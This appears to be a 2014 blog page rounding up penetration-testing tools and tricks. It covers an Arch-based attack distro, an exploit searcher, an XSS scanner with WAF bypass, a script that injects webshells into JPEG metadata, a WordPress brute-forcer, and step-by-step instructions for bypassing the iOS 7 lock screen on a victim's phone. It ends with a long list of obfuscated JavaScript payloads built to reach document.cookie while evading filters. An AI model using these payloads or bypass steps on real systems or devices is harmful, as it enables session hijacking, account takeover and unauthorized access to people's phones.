Jun 13, 2014

Tools: ArchAssault v2014.06.01 – Arch Linux ISO for Penetration Testers Released


The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source.

While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

Source: https://archassault.org/download/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 12, 2014

Tools: Pompem - Exploit Searching Tool

Pompem is an open source tool, which is designed to automate the search for exploits in major databases. Developed in Python, has a system of advanced search, thus facilitating the work of pentesters and ethical hackers. In its current version, performs searches in databases: Exploit-db, 1337day, Packetstorm Security

git clone https://github.com/rfunix/Pompem.git Pompem-dev


Source: https://github.com/rfunix/Pompem

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: XSSYA - Tool XSS to bypass WAF

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods)
• Method number 1 for Confirmation Request and Response
• Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded
• Support HTTPS
• After Confirmation (execute payload to get cookies)
• Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP)
• Can be run in (Windows - Linux)

XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal

$ Python xssya.py
Links should end with (/or=or?)
Example
$ Python xssya.py
http://www.domain.com/ http://www.domain.com= http://www.domain.com?

Source: https://github.com/yehia-mamdouh/XSSYA


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: 0verLFI

 A simple script to inject webshells in JPEG metadata


Source: https://github.com/0verl0ad/0verLFI


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 11, 2014

Tools: WPBF - Wordpress Brute Force Tool


Features


  • Bruteforce using a dictionary file (a small and effective one is provided)
  • Threading for speed boost of the bruteforce tasks
  • HTTP Proxy Support
  • Username enumeration/detection (TALSOFT-2011-0526 with fallback to author's archive page and content parsing)
  • Fetching keywords from blog's content and use them in the password list
  • WordPress version fingerprint
  • Detection of known and unknown plugins (including Login LockDown, that makes the bruteforce useless)
  • WordPress remote path detection
  • Advanced logging (with it's own configuration file) using Python's logging library
Download: git clone git://github.com/atarantini/wpbf

Source: http://atarantini.github.io/wpbf/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 10, 2014

Howto: Bypass iOS 7 LockScreen & Access ANY iPhone Application

2 Requirement for bypass iOS7 lockscreen
- Miss Call
- Access to Control Panel

1. The victim still open application before close screen.(Work with Messages, LINE, Facebook)

2. After screen was logged, go to airplane mode with Control Panel.

3. Go to miss call screen and click it.

4. Now, you're in the application that you open before logged screen.


Source: https://www.youtube.com/watch?v=Hg9Vy7XzGZY

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Many obfuscate XSS to get cookie

window:
window["alert"]("ISR")
window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window["ale"+"\x72\x74"]()
window["\x61\x6c\x65\x72\x74"]()
window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window['ale'+'\x72\x74']()
window['\x61\x6c\x65\x72\x74']()
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

this alert:
this["alert"]("ISR")
this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
this["ale"+"\x72\x74"]()
this["\x61\x6c\x65\x72\x74"]()
this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
this['ale'+'\x72\x74']()
this['\x61\x6c\x65\x72\x74']()
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

this document:
this["document"]["cookie"]
this["document"]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]
this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
this['document']['cookie']
this['document']['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65']
this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']

document cookie:
document["cookie"]
document["\x63\x6f\x6f\x6b\x69\x65"]
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
document['cookie']
document['\x63\x6f\x6f\x6b\x69\x65']
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
 
 
 
Source: http://www.scribd.com/doc/226925089/Stylish-XSS-in-Magento-When-Style-helps-you 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.